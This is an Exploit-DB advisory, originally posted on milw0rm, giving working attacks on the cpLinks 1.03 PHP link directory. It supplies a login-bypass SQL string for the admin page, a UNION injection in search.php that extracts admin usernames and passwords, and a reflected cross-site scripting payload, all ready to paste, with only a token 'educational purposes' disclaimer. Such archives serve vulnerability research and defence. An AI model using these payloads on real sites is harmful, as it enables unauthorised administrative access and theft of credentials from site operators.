Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting

EDB-ID:

5538

CVE:

2008-2181 2008-2180

EDB Verified:

Author:

InjEctOr5

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-05-04

Vulnerable App: 
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)


Author :: InjEctOr [s0f (at) w (dot) cn]

&& FishEr762  [SQ7 (at) w (dot) cn ]


Script Site :: http://www.cplinks.com/

Dork  :: ThinkinG 

Greets :: Allah ,TryaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.



--------------------------------------------[C o n t e x t]-----------------------------------------




##########################
##Expl0!T1 bypass login ##
##########################


http://[site]/[script]/admin/


in username filed insert:

' or 1=1 /*    

addition, some time must type any thing in password field



#####################################
## Explo!T 2  Reomte SQL Injection ##
#####################################

file/
search.php


@ line 57 ::


$query = "SELECT
			category,
			sub_category,
			title,
			url,
			description,
			status
			FROM mnl_links
			WHERE category='$search_category'
			AND description LIKE '%$search_text%'
			AND approved='yes'
			ORDER BY status, rec_timestamp";


search url: http://localhost/[script's_bad_day]/search.php

so just insert in search filed this query :)

' union select admin_username,admin_password,3,4,5,6 from mnl_admin/*


##################
## EXpl!T3 Xss  ##
##################


Vulnerability found in script search.php .. also !


in search field insert  >"> and then  xss c0de ::



example: >"><script>alert("!! InjEctOr TeaM Became Here !!")</script>>



############### T|-|4t'5 4ll ############### 


-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-04]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services